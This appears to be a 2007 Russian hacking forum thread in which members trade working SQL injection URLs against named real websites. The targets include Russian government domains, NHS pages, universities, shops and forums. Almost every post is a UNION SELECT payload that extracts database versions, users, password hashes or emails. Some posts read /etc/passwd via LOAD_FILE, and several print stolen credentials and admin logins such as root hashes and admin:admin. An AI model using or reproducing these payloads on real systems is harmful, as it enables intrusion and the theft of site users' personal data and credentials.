http://003.saratov.ru/stroki.php?strk=11005&gsn=-1+union+select+concat(user(),char(58),version())/*
http://003.saratov.ru/stroki.php?strk=11005&gsn=-1+union+select+concat(login,char(58),pass)+from+us ers+limit+0,1/*
http://www.info-shop.ru/index.php?idk=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat(data base(),char(58),user(),char(58),version()),13/*
http://www.vzamen.ru/index.phtml?act=lot_list&title=cat_list&cat_id=-1+union+select+concat(database(),char(58),user(),c har(58),version()),2,3/*
http://www.globussalon.ru/detail.php?chapId=-1+union+select+concat(database(),char(58),user(),c har(58),version())/*
Thanat0z
03.04.2007, 14:50
чувак там стоит 4 версия мускула, селект мона использовать, тоесть мона при желании повытягивать базы, но у меня его нет =))
черт, я более 3 недель скулей не искал, вообще не внимателен, раз там 4 версия, покажите мне юнион ;)
2Thanat0z
/me смеялся =)
да, туплю я :) всегда делал скуль с первой переменной, а тут чет подумал сделать со второй, ради разнообразия :) не знал что от этого ничего не происходит ;) Век живи, век учись
http://www.spe-moscow.org/ru/news/index.php?id=-36+union+select+1,2,3,4,database()/*
http://recycling.org.ru/modules/event/index.php?op=show&id=-5+union+select+1,2,3,concat(database(),char(58),us er(),char(58),version()),5/*
http://baymusic.ru/category.php?rid=78 - ошибка
http://baymusic.ru/category.php?rid=78/* - закоментили фигню, ошибки нет
http://baymusic.ru/category.php?rid=78+order+by+2/* - ошибка
http://baymusic.ru/category.php?rid=78+order+by+1/* - все ок, значит 1 столбец
http://baymusic.ru/category.php?rid=78+union+select+1/* - ошибка, кол-во столбцов не совпадает
Можете объяснить что тут не так? Запрос к базе там такой стоит, или order+by в этой базе работает не так как обычно? =/
http://www.sport.com.ua/vote.phtml?id=-180+union+select+concat(username,char(58),password ),2+from+users/*
}{0TT@БЬ)Ч
03.04.2007, 17:10
жалко только до данных моделей чёт не смог добраться http://www.fashion-monitor.com/discuss.php?razdel=news&artikelid=272+union+select+1,2,3,4,5,6,7,8+from+mo dels/*
расшивровываем и ищем админку ;)
http://www.fashion-monitor.com/discuss.php?razdel=news&artikelid=272+union+select+1,2,3,4,5,6,7,concat(us ername,char(58),password)+from+admin/*
ну на кройняк можно и на форум напасть ;) http://www.fashion-monitor.com/discuss.php?razdel=news&artikelid=272+union+select+1,2,3,4,5,6,7,concat(us ername,char(58),user_password)+from+phpbb_users+li mit+4,1/*
http://www.espana.ru/rus/espanola/kp/kp.php?did=1000000+union+select+1,2,3,concat(user( ),char(58),version()),5,6,7,8/*
http://www.espana.ru/rus/espanola/kp/kp.php?did=1000000+union+select+1,2,3,concat(login ,char(58),password),5,6,7,8+from+user+limit+0,1/*
http://www.komus-opt.ru/news.php?id=-1+union+select+concat(database(),char(58),user(),c har(58),version()),2,3/*
shop
http://www.berneboek.com/shop/product.php?id=-2691+union+select+1,password,3,4+from+users/*
http://www.daymusic.ru/announce.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12, 13/*
доступ к мускл.юзер был, потом исчез о_0
mnr.gov.ru Вытянул мыло подписчиков, логин, пароль, мыло пользователей.
http://www.mnr.gov.ru/part/?pid=-1+union+select+1,concat(database(),char(58),user() ,char(58),version()),3,4/*
http://www.mnr.gov.ru/part/?pid=-1+union+select+1,concat(user,char(58),password),3, 4+from+mysql.user+limit+0,1/*
http://www.mnr.gov.ru/part/?pid=-1+union+select+1,email,3,4+from+subscribe+limit+0, 1/*
http://www.mnr.gov.ru/part/?pid=-1+union+select+1,concat(login,char(58),password,ch ar(58),email),3,4+from+users+limit+0,1/*
Не забываем юзать прокси!
http://www.kharkov-sport.com/news.phtml?id=-1+union+select+concat(database(),char(58),user(),c har(58),version()),2,3,4,5,6,7,8,9,10,11/*
mnr.gov.ru
http://www.mnr.gov.ru/part/?pid=-1+union+select+1,concat(database(),char(58),user/*
Бгга =)
http://les.mnr.gov.ru
http://les.mnr.gov.ru/part/?act=more&id=1432&pid=-1+union+select+concat(login,char(58),password),2+f rom+users/*
http://voda.mnr.gov.ru
http://voda.mnr.gov.ru/part/?pid=-1+union+select+1,concat(login,char(58),password),3 ,4+from+users/*
Какие то там пилоты. http://www.calpilots.org/
http://www.calpilots.org/html/article.php?sid=1722'
11 column, table: mysql.user
http://www.calpilots.org/html/article.php?sid=-1722+union+select+1,2,3,4,5,6,7,8,9,10,11+from+mys ql.user
user,password
http://www.calpilots.org/html/article.php?sid=-1722+union+select+1,2,3,4,5,concat(user,0x3a,passw ord),7,8,9,10,11+from+mysql.user
root:161de26c23c0854e
Седня слабенько(( Турагентсво.
http://www.kakady.ru/index.php?akus=1&id=11111+union+select+1,2,3,4,5/*
И аватарки (выводится только двойка, между банерами)
http://www.avatary.ru/avatar.php?w=100&a=0&pid=940+union+select+1,2,3,4,5,6,7,8,9,10,11
ssk.ex0.uf0
03.04.2007, 21:53
Мимо надписи "France opens secret UFO files covering 50 years" несмог равнодушной пройти =)
http://www.breitbart.com/article.php?id=1'+union+select+1,2,DATABASE(),4,5, 6,USER(),8,9,10,11,12/*
А вот если на запрос:
http://www.breitbart.com/article.php?id=1'+union+select+1,2,concat(username ,char(58),password),4,5,6,7,8,9,10,11,12+from+mysq l.user/*
Отвечает "Access denied" всё вилы?(
rock-n-roll.ru
http://www.rock-n-roll.ru/clubs.php?club=-1'+union+select+1,concat(username,0x3a,user_passwo rd),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22+from+rnr_forum_users+limit+1,1/*
но форум не пашет.. :D
дополнительно:
http://www.rock-n-roll.ru/show.php?file=../../../../
сайтики :D
http://rock-n-roll.ru/administration_phpmyadmin/
phpmyadmin
http://www.rock-n-roll.ru/administration/admin/
админка
http://www.rivierenland.nl/index.php?pag=shop.php?id=-52+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,AES_DECRYPT(AES_ENCRYPT(login,0x71),0x71)+fro m+users/*
http://www.regiosat.com/index.php?page=shop.php?id=-128+union+select+1,2,login,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18+from+users/*
http://lix.nl/index.php?page=shop.php?id=-945+union+select+1,2,login,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18+from+users/*
таблицу с пассами не подобрал, мб ее там вобще нету=\
http://www.optimistmag.org/ru/0017/one.php?id=-723+union+select+1,2,3,4,5,6,7,8,concat(user(),cha r(58),database(),char(58),version()),10,11,12,13,1 4,15,16,17,18,19,20/*
http://gaia.arctic.org.ru/news/news.php?id=-88+union+select+1,2,concat(user(),char(58),databas e(),char(58),version()),4,5,6,7/*
progmusic.ru
http://progmusic.ru/rus/modules.php?name=Sections&op=viewarticle&artid=-1+union+select+1,2,username,user_password,5,6,7,8+ from+phpbb_users+limit+4,1/*
concat() не рулит, антихек =\
еще есть форма на сайте, база вроде другая.. кому интересно - копните ;)
и еще
voyage-luxe.ru
http://www.voyage-luxe.ru/chapter60.html?uid=-1+union+select+1,convert(concat(user,0x3a,password )+using+cp1251),3,null,5+from+mysql.user/*
мб и было, пофиг..
www.maak.ru - не путаем с наркоманским сайтом!
http://www.maak.ru/news.php3?id=-67+UNION+SELECT+1,concat(user(),0x3a,version()),3, 4,5/*
http://www.maak.ru/admin/ - вход без пароля!
http://www.bext.ru
Банк Тулы!
http://www.bext.ru/news.php3?id=-85+union+select+1,concat(user(),0x3a,version()),3, 4,5,6,7,8,9/*
titoff.ru
http://www.titoff.ru/news/print.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 +from+news/*&gid=4
http://www.picnroll.com/us/detail.php?id=-35+union+select+1,2,3,user,5,6,7,8,9,10,11,12,13,1 4,15+from+admin/*
http://haytom.us/showarticle.php?id=19+union+select+1,version(),3,4 ,5/*
http://www.onami.us/events/event.php?id=-14+union+select+1,2,concat(version(),0x3a,database ()),4,5,6/*
http://www.kzt.oswiata.org.pl/news.php3?id=-37+union+select+1,concat(version(),0x3a,user(),0x3 a,database()),3,4,5,6,7,8/*
dancers.org
http://www.dancers.org/news.php3?id=-5'+union+select+1,concat(version(),0x3a,user(),0x3 a,database()),3,4,5/*
Быстро заскочил домой на обед, в процесе приёма пищи решил поискать скули. Таблицы не перебирал но походу там есть чё стоещее =)
http://www.clabbergirl.com/store/store.php?mode=cat&cat_id=-3%20union%20select%201,user_Username,3,user_passwo rd,5%20from%20users/*
Шоп какой-то. Пароли открыты
__:)__
И кстати, если вы задолбались убирать пробелы из скулей, просто нажмите на кнопку "цитировать".
Пароли открыты
1$WEVsiCKUmcU
больше похоже на md5 unix
Согласен, похоже, но на сколько я знаю, md5 unix состоит из 31 символа
ну да, видно тут какая-то своя криптовка пасса...
Woldemar
04.04.2007, 14:08
http://bet365.enetpulse.com/?s=6&lang=en&g=ts&lid=
137&sid=2007&stats=true&id=-1%20union%20select%
20LOAD_FILE(concat(char(47,101,116,99,47,112,97,11 5,
115,119,100))),2+limit+1/*
Помогите ка раскачать
http://bet365.enetpulse.com/?s=6&lang=en&g=ts&lid=
137&sid=2007&stats=true&id=-1%20union%20select%
20LOAD_FILE(concat(char(47,101,116,99,47,112,97,11 5,
115,119,100))),2+limit+1/*
Помогите ка раскачать
/etc/passwd
http://bet365.enetpulse.com/?s=6&lang=en&g=ts&lid=%20%20137&sid=2007&stats=true&id=-1+union+select+LOAD_FILE(0x2f6574632f706173737764) ,2/*
MySQL root (видимо без пасса)
http://bet365.enetpulse.com/?s=6&lang=en&g=ts&lid=%20%20137&sid=2007&stats=true&id=-1+union+select+concat(user,char(58),password),2+fr om+mysql.user/*
Woldemar
04.04.2007, 14:53
/etc/passwd
http://bet365.enetpulse.com/?s=6&lang=en&g=ts&lid=%20%20137&sid=2007&stats=true&id=-1+union+select+LOAD_FILE(0x2f6574632f706173737764) ,2/*
MySQL root (видимо без пасса)
http://bet365.enetpulse.com/?s=6&lang=en&g=ts&lid=%20%20137&sid=2007&stats=true&id=-1+union+select+concat(user,char(58),password),2+fr om+mysql.user/*
Не понял etc/passwd а что дальше то. :confused: сорри
Еще один магазин. Таблица users, а выводит, по всей видимости, названия моделей =(
http://www.provideo.ru/index.php?action=list&page=1&category=-51+union+select+1,password+from+users+limit+0,1/*&f=c
Constantine
04.04.2007, 16:06
Одна из идеальных =)
http://www.immunisation.nhs.uk/article.php?id=9999999'+union+select+1,2,concat_ws (char(58),name,username,password),concat(version() ,char(58),user()),5,6,7,8,9+from+user+limit+2,2/*
http://www.zdravlje.hr/clanak.php?id=-12909+union+select+1,2,3,4,5,6,7,8,9,10,table_name ,12,13+from+INFORMATION_SCHEMA.TABLES+limit+7,1/* http://www.hnk.hr/hr/predstava.php?id=-18+union+select+1,2,3,4,5,6,7,8,AES_DECRYPT(AES_EN CRYPT(concat(login,0x3a,password),0x71),0x71),10,1 1,12,13,14,15+from+users/* http://www.gamer.hr/najave/swat4_ssynd.php?id=-210%20UNION%20SELECT%201,concat(email,0x3a,passwor d),3,4,5,6,7,8,9+from+user+limit+3,1/*
http://www.dynamomania.com/news.php?p=message&id=-1+union+select+1,2,3,convert(concat(database(),cha r(58),user(),char(58),version()),char),5,6/*
http://www.dynamomania.com/news.php?p=message&id=-1+union+select+1,2,3,convert(concat(name,char(58), pwd,char(58),command,char(58),email,char(58),url,c har(58),country,char(58),city),char),5,6+from+user s+limit+0,1/*
А вот эта может уже и была...
http://www.web-segment.ru/index.php?p=-1+union+select+1,convert(concat(database(),char(58 ),user(),char(58),version()),char),3,4,5,6,7,8,9,1 0,11,12,13,14,15/*
Constantine
04.04.2007, 17:08
http://c82.net/article.php?ID=-25+union+select+concat(version(),char(58),user()), 2,3,4/*
чет с таблицами не получилось =\
+
http://www.dukemednews.org/news/article.php?id=-6041+union+select+concat(user,char(58),password),2 ,3,4,5,version(),7,8+from+mysql.user/*
http://freejob.ru/message_to_vacancy.php?id_m=-1'+UNION+SELECT+1,2,3,4,5,6,7,concat(user,0x3a,pas sword),9,11,12,13,14,15,16,17,18,19,20+FROM+mysql. user/*
root:nhfdthcf
http://bila.com.ua/price_view.php?price_id=-1+union+select+1,2,3,4,5,6,7,concat(database(),cha r(58),user(),char(58),version()),9,10,11,12,13,14/*
Constantine
04.04.2007, 18:02
http://www.digitalidworld.com/modules.php?op=modload&name=News&file=article&sid=-89+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,c oncat_ws(char(58),version(),user(),database()),16, 17,18,19,20,21,22,23/*&mode=chrono&order=0
Вывод в тайтле( сам чуть не прозевал=\)
http://www.michaeljfox.org/news/article.php?id=-5+union+select+convert(concat_ws(char(58),version( ),user(),database())+using+latin1)/*
http://bila.com.ua/price_view.php?price_id=-1+union+select+1,2,3,4,5,6,7,concat(database(),cha r(58),user(),char(58),version()),9,10,11,12,13,14/*
бгг =)
http://bila.com.ua/price_list.php?searchtype=33&searchsub=-1+union+select+1,2,version()/*
www.f1-world.ru
5 мускуль
http://www.f1-world.ru/news/news.php3?idnews=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*
http://www.fpp-iis.ru/iss.php?page=-1+union+select+1,2,3,4,5,6/*
Возможно ли что-нибудь дальше?
http://www.fpp-iis.ru/iss.php?page=-1+union+select+1,2,3,4,5,6/*
Возможно ли что-нибудь дальше?
для mysql.user запрос не прокатил... может быть есть другая база данных...
SELECT command denied to user 'tib_ips'@'xxx.xxx.xxx.xxx' for table 'user'
alextoun
04.04.2007, 19:56
http://www.f1-world.ru/news/news.php3?idnews=-1+union+select+1,table_name,3,4,5,6,7,8,9,10,11+fr om+information_schema.tables+limit+40,1/*
пока еду дальше
http://www.f1-world.ru/news/news.php3?idnews=-1+union+select+1,column_name,3,4,5,6,7,8,9,10,11+f rom+information_schema.columns+where+table_name=ch ar(120,95,111,114,100,101,114,115)+limit+19,1/*
заипался
http://www.interfax-religion.ru/?act=news&div=-1+union+select+concat(database(),char(58),user(),c har(58),version()),2,3,4,5,6,7,8,9,10,11,12,13/*
http://www.interfax-religion.ru/?act=news&div=-1+union+select+concat(id,char(58),email),2,3,4,5,6 ,7,8,9,10,11,12,13+from+subscribe+limit+0,1/*
http://askbook.kiev.ua/books.php?book=-1+union+select+1,concat(database(),char(58),user() ,char(58),version()),3,4,5,6,7,8,9,10,11,12,13,14, 15/*
LOAD_FILE('etc/passwd') проходит, но выдает путой результат ^_____^
На загрузку файлов не проверял.
На ошибки внимания не обращаем, имена файлов берутся из базы, поэтому ругает за отсутсвие.
http://www.produktonline.ru/list.php?link=2166+union+select+1,2,3,4,version(), 6,7,8,9,10,11,12,13,14,15,16,17,18,LOAD_FILE(0x2f6 574632f706173737764),20,21,22,23,24,25,26,27
http://www.di-do.ru/index.php?all=1&c1=-1+union+select+1,concat(email,0x3a,pass),3,4+from+ clients/*
compoundsemi.com
http://compoundsemi.com/documents/view/generic.php?id=-6913/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat(name ,0x3a,password),18+from+admin+limit+2,1/*
C пасами жопа =\
Можно книжек заказать =)
http://petropol.com/browse/fetch.php3?id=-104544+union+select+1,2,3,LOAD_FILE(0x2f6574632f70 6173737764),5,6,7,8,9,10,11,12,13,14,15,16,17,19,2 0,21,22,23,24,25,26,27,28,29,30,31/*&type=book
http://oz.com.ru/st.php?id=218+union+select+concat(database(),0x3a, version()),2,3,4,5/*
http://gapart.com/ru/he/work.php?catid=1&page=1&id=-4+union+select+1,2,version(),4,5,6/*
akusherstvo.ru :)
http://www.akusherstvo.ru/magaz.php?action=cat_show&ordby=type&type_active=-1+union+select+concat(user,0x3a,password),2+from+m ysql.user/*
root:5d1a051535bd4dcd
также чем-то могут быть интересны таблицы admin, myuser, phpbb_users, a_admin
пример скули форум:
http://www.akusherstvo.ru/magaz.php?action=cat_show&ordby=type&type_active=-1+union+select+concat(username,0x3a,user_password) ,2+from+phpbb_users+limit+2,1/*
Администратор:3693dc9bc65e54f85826ddc a773dbd5b
8.5k users
в общем-то, там еще 150 таблиц, есть простор для мозгового штурма)
Может и было...
http://www.cybertown.ru/catalog.php?action=site&id=-1+union+select+1,2,3,concat(database(),char(58),us er(),char(58),version()),5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19/*
http://www.cybertown.ru/catalog.php?action=site&id=-1+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19+from+information_schema.tabl es+limit+16,1/*
http://www.cybertown.ru/catalog.php?action=site&id=-1+union+select+1,2,3,column_name,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19+from+information_schema.col umns+where+table_name=char(97,99,99,111,117,110,11 6,115)+limit+0,1/*
http://www.cybertown.ru/catalog.php?action=site&id=-1+union+select+1,2,3,concat(ID,char(58),LOGIN,char (58),PASS,char(58),FIO,char(58),EMAIL),5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19+from+accounts+limit+0 ,1/*
http://www.divanodrom.ru/textile.php?id=-1+union+select+convert(concat(database(),char(58), user(),char(58),version()),char)/*
http://www.fmodels.net - я хекнул много блондинок, теперь они все мои =)
http://www.fmodels.net/news.php3?id=-10+union+select+1,concat(user,0x3a,password),3,4,5 ,6,7+from+mysql.user+limit+1,3/*
Надо с лимитом играться =\
http://redcame.org.ar/news.php3?id=-550+union+select+1,2,3/*
2 zl0ba:
зачем лимит?
сразу весь список :)
http://www.fmodels.net/news.php3?id=-10+union+select+1,2,concat(user,0x3a,password),4,5 ,6,7+from+mysql.user/*
а по твоему линку вообще вывода не увидел, мб глюки..
Ну и еще один интернет - магазин...
http://www.bestwatch.ru/podves.phtml?idb=52600+union+select+1,2,3,4,5,conc at(user,0x3a,password),7,8,9,10,11,12+from+mysql.u ser/*
root:7c09cac038aef27b
Админку не нашел, в robots.txt тоже не прописано =\
http://www.pr.ua/news.php?new=-3793+union+select+concat(user(),0x3a,version(),0x3 a,database())/*
Constantine
05.04.2007, 12:53
http://cityonahillpress.com/article.php?id=-473+union+select+1,2,3,version(),database(),6,user (),8,9,10,11,12,13,14,15,16,17,18,19/*
Центр по изучению стран постсоветского зарубежья РГГУ
http://www.postsoviet.ru/page.php?pid=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12, 13,14,15,16/*
http://www.mp3prikol.ru/?action=view_track&track_id=-1+union+select+1,2,concat(database(),char(58),user (),char(58),version()),4,5,6,7/*
http://www.rightsite.ru/cgi-bin/list.pl?mode=show_yellow&kod_tovar=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,convert(con cat(database(),char(58),user(),char(58),version()) ,char),13,14,15,16,17,18,19,20,21/*
http://www.vladimirka.ru/kulinar/?razdel=45&type=tovar&id=-1+union+select+1,222,3,4,555/*
rabota.disell.ru
rabota.disell.ru/print.php?ID=-1+union+select+1,concat(email,0x3a,pass),3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19+from+users+limi t+0,1/*
rabota.disell.ru/print.php?ID=-1+union+select+1,concat(email,0x3a,pass),3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19+from+users+limi t+1,1/*
=\
Интеллектуальная поисковая система Disell.ru
http://top100.disell.ru/top.php?cat=-1+union+select+1,version(),user()/*
таблицы не подобрал \=
Начал осваивать MsSQL.
Магазичик всякой фигни =\
Вывод версии базы :
http://www.odarim.ru/sad/item.asp?idItem=7457+or+7457=@@version--
**********
Tables : dtproperties, hits, cards, cards_dbtree, class_goods, class_goods2, class_pub, clients, D99_Tmp, DBTree, DBTreeHead, flowers, flowers_dbtree, fooo, forum, hits_eng, images, items_authors, items_authors_dbtree, items_authors_items_authors, items_goods, items_goods_dbtree, items_goods_items_pubs, items_menu, items_menu2,items_news, items_pubs, listcena, main_shtuchki, new_shtuchki, news_shtuchki, old_clients, old_orders, orders, sysconstraints, syssegments, t_jiaozhu, TecParam, timetable, timeuser, Users, valuta
**********
Table : forum
Columns : id_post, id_list, key_publik, name,gender, age, prof, message, title_answer, answer
**********
Table : clients
Columns : id_clients, date_create, fio, phones, mail, dostavka, adress, metro, package, comment, date_dostavka, place, discount, adv, ref, hide
**********
Table : Users
Columns : idUser, Nick, Password
Сами значения выводить не пробовал, все в ваших руках! =)
ОАО "НГК "Славнефть"
=-OOO
http://www.slavneft.ru/press/print.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9/*
http://www.santechmart.ru/print.php?id=-1+union+select+version()/*
KBE - Оконные системы
http://www.kbe.ua/includes/print.php?id=-1+union+select+1,2,3,4,5,6,7,8+from+users+limit+0, 1/*
таблица есть, названия колонок не подобрал... \=
kurskcity.ru
http://www.kurskcity.ru/print.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10/*
http://vid.org.ua/print.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10/*
http://mosgs.ru/?module=card&view=full&id=-1+union+select+1,2,3,concat(database(),char(58),us er(),char(58),version()),5,6,7,8,9,10,11,12/*
http://mosgs.ru/?module=card&view=full&id=-1+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12 +from+information_schema.tables+limit+19,1/*
http://mosgs.ru/?module=card&view=full&id=-1+union+select+1,2,3,concat(table_schema,char(58), column_name),5,6,7,8,9,10,11,12+from+information_s chema.columns+where+table_name=char(77,65,73,76)+l imit+0,1/*
http://mosgs.ru/?module=card&view=full&id=-1+union+select+1,2,3,concat(ID,char(58),EMAIL,char (58),ORGANIZATION_REF),5,6,7,8,9,10,11,12+from+db4 797a.MAIL+limit+0,1/*
http://www.earngame.com/index.php?func=fileinfo&id=-1+union+select+1,2,3,4,5,6,7,8,9,concat(database() ,char(58),user(),char(58),version()),11/*
}{0TT@БЬ)Ч
05.04.2007, 18:46
http://top100.disell.ru/top.php?cat=-1+union+select+1,version(),user()/* таблицы не подобрал \=не поверю чтоб ты не заметил версию ;) http://top100.disell.ru/top.php?cat=-1+union+select+1,null,concat(id,char(58),password, char(58),mail)+FROM+top_users/*
http://gostudy.com.ua
http://gostudy.com.ua/news.phtml?id=-40+union+select+1,concat(user(),0x3a,version()),3, 4,5,6,7,8,9/*
http://www.calit2.net/newsroom/article.php?id='%20union%20select%201,concat(user, char(58),password),3,4,5,6,7,8,9%20from%20mysql.us er/*
http://www.dailycal.org/printable.php?id=-15734%20UNION%20SELECT%200,1,2,3,4,AES_DECRYPT(AES _ENCRYPT(concat(user,char(58),password),0),0),6,7, 8,9,10,11,12,13,14,15,16%20from%20mysql.user/*
__:)__
http://lib.chistopol.ru/?lib=dictionary&d=23&id=-1+union+select+1,2,concat(database(),char(58),user (),char(58),version())/*
http://lib.chistopol.ru/?lib=dictionary&d=23&id=-1+union+select+1,2,table_name+from+information_sch ema.tables+limit+46,1/*
http://lib.chistopol.ru/?lib=dictionary&d=23&id=-1+union+select+1,2,concat(table_schema,char(58),co lumn_name)+from+information_schema.columns+where+t able_name=char(109,97,105,110,95,117,115,101,114)+ limit+0,1/*
http://lib.chistopol.ru/?lib=dictionary&d=23&id=-1+union+select+1,2,concat(id,char(58),user_login,c har(58),user_pass,char(58),user_name,char(58),user _mail,char(58),user_url,char(58),user_icq,char(58) ,user_maillist,char(58),user_uroven)+from+svgroup_ avenbibl.main_user+limit+0,1/*
http://www.jemjabella.co.uk/postbyid.php?id='
http://www2.bham.ac.uk/core/core_picker/download.asp?documenttable='
http://www.thecomedystore.co.uk/page.php?id='
http://www.franinfo.co.uk/exhibitors.php?id='
http://www.franinfo.co.uk/exhi_detail.php?id='
http://www.jemjabella.co.uk/postbyid.php?id='
http://www.teltonika.lt/ru/pages/view/?id='
http://www.bendruomenes.lt/news.php?id='
http://www.biuropasaulis.lt/pk/produkcija/models.php?id='
http://www.bendruomenes.lt/news.php?id='
http://www.avilys.lt/index.php?id='
http://paulauskas.president.lt/one.phtml?id='
http://www.skautai.lt/users.php?id='
http://www.skautai.lt/index.php?id='
http://kaunas.lcn.lt/arkikatedra/index.php?id='
http://www.auksinisvarnas.lt/index.php?id='
http://www.eurodesk.lt/index.php?language='
http://www.esecurity.lt/article.php?id='
http://leidykla.ktu.lt/main.php?ID='
вот щас очень занят а хотел поковырять --давайте сами =)
Вывод в title'е:
http://www.islamcom.ru/material.php?id=10000000+union+select+concat(datab ase(),char(58),user(),char(58),version()),2,3,4,5, 6,7,8,9,10,11,12,13,14/*
http://www.islamcom.ru/material.php?id=10000000+union+select+table_name,2 ,3,4,5,6,7,8,9,10,11,12,13,14+from+information_sch ema.tables+limit+20,1/*
http://www.islamcom.ru/material.php?id=10000000+union+select+table_column ,2,3,4,5,6,7,8,9,10,11,12,13,14+from+information_s chema.columns+where+table_name=char(105,99,95,115, 117,98,115,99,114,105,98,101,114,115)+limit+0,1/*
http://www.islamcom.ru/material.php?id=10000000+union+select+concat(id,ch ar(58),email),2,3,4,5,6,7,8,9,10,11,12,13,14+from+ ic_subscribers+limit+6,1/*
2genom--
Щас ковырнем малость :)
http://www.thecomedystore.co.uk/page.php?id=-2%20union%20select%201,concat(name,char(58),email) %20from%20orders/*
http://www.bendruomenes.lt/news.php?id=1%20union%20select%201,concat(username ,char(58),password),2,4,5,6,7,8,9,0%20from%20users/*
http://www.ezgulik.org/news.php?id=-197+union+select+1,2,version(),concat(user(),0x3a, database()),5,6/*&status=1
http://www.karavan-megastore.com.ua
Версия MySql:
http://www.karavan-megastore.com.ua/?view=read&n_id=-43+UNION+SELECT+null,VERSION(),null,null
Логин текущего пользователя базы данных:
http://www.karavan-megastore.com.ua/?view=read&n_id=-43+UNION+SELECT+null,USER(),null,null
Имя используемой базы данных:
http://www.karavan-megastore.com.ua/?view=read&n_id=-43+UNION+SELECT+null,DATABASE(),null,null
Вот так всё простинька))
http://www.payolibre.com/noticias/noticias2.php?id=-413+union+select+1,2,3,4,user(),6/*
http://www.jerashfestival.com.jo/inner.php?id=-9+union+select+version()/*
http://www.iblaw.com.jo/practice.php?id=-8+union+select+1,database(),3,4/*
http://www.uris.com.ua/index.php?page=8&id=-8+union+select+1,2,concat(database(),0x3a,version( )),4,5,6/*
вывод в title:
http://www.designplace.org/tutorials.php?page=1&c_id=-27+union+select+version(),2,3/*
1) Не осилил =(
http://www.rpgserv.ru/gu.php?id=13'
2) Осилил, гуд. Пароли без шифровки, присутствуют мейлы!!!
http://cybertown.ru/catalog.php?action=site&id=-89483+union+select+1,2,concat(nick,char(58),pwd,ch ar(58),mail),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19+from+forum_users+limit+1,1/*
admin:HellBoy:help@cybertown.ru
http://www.grinderclinic.ru/index.php?section=-1+union+select+convert(version()+using+cp1251)/*
ничего интересного не нашел..
http://www.rustrana.ru/new.php?nid=-1+union+select+1,2,3,4,5,version(),7,8,9,10,11,12, 13,14/*&new=1
аналогично.. лень перебирать таблицы :( потыркал наугад и забил)
http://www.linkdump.be/index.php?y=-2003+union+select+1,2,user,4,5,6,7,8+from+users/*&m=9
колонку с пасами не нашёл =(
http://www.facilities.upenn.edu
University of Pennsylvania
http://www.facilities.upenn.edu/mapsBldgs/view_map.php3?id=-407+union+select+1,2,3,4,concat(version(),0x3a,use r(),0x3a,database()),6,7,8,9,10,11/*
колонку с пасами не нашёл =(
есть подозрение, что пароль в третьем столбце ;)
http://www.linkdump.be/index.php?y=-2003+union+select+u.*+from+users+u/*&m=9
а сопоставить с логином - по id или email
http://www.linkdump.be/index.php?y=-2003+union+select+1,2,id,user,email,6,7,8+from+use rs/*&m=9
shop
http://www.velocity.la/viewnewsarticle.php?id=-8+union+select+1,2,username,password,5,6,7+from+ad min/*
http://www.velocity.la/admin
user:admin
pass:admin
http://www.skirtsinadvertising.com/interview.php?id=-1+union+select+1,concat(user(),0x3a,database(),0x3 a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18/*
Thanat0z
06.04.2007, 02:20
http://www.ukmotoringdirectory.co.uk/motoring.php?id=2025+UNION+SELECT+null,null,conver t(VERSION()+using+latin1),null,null,null,convert(p assword+using+latin1),null,null,null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null,null+from+admin/*
админка: http://www.ukmotoringdirectory.co.uk/admin
http://www.chathamhouse.org.uk/index.php?id=5&cid=110
19 колонок, 3 версия
http://www.southcentral.nhs.uk/page.php?id=182%20group%20by%209/*
срабатывает редирект :(
версия 4.0.26
база nhssc_db
спасибо -={x_Lex}=- за помощь
VampiRUS
06.04.2007, 06:09
http://softomsk.ru/soft.php?id=-1+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(conca t(name,0x3a,password),0x71),0x71),5,6,7,8,9,0,1,2+ from+site_members/*
Admin:5bb3d1e738e0bfeafe71bcfea2f002a8=alexsoft
http://softomsk.ru/admin/
http://sex-dating.ro/user.php?id=-1+union+select+1,concat_ws(0x3a,nickname,parola,em ail),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5 ,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0+from+users/*
еле допёр какие там поля в таблице.
http://www.hotelcammerpoorte.be/index.php?page=-1+union+select+1,2,3,4,concat(username,0x3a,passwo rd),6+from+users/*&lang=EN
user: Admin
password: 1000
http://www.hotelcammerpoorte.be/admin.php
http://www.falklands-malvinas.com/forum/kb.php?mode=cat&cat=-1%20union%20select%201,concat(user_id,char(58),use rname,char(58),user_email,char(58),user_icq,char(5 8),user_password),3,4,5,6%20from%20phpbb_users%20l imit%201,2/*
http://forum.rleeermey.net/kb.php?mode=cat&cat=-1%20union%20select%201,concat(user_id,char(58),use rname,char(58),user_email,char(58),user_icq,char(5 8),user_password),3,4,5,6%20from%20phpbb_users%20l imit%201,2/*
http://www.reyvarela.net/forums/kb.php?mode=cat&cat=-1%20union%20select%201,concat(user_id,char(58),use rname,char(58),user_email,char(58),user_icq,char(5 8),user_password),3,4,5,6%20from%20phpbb_users%20l imit%201,2/*
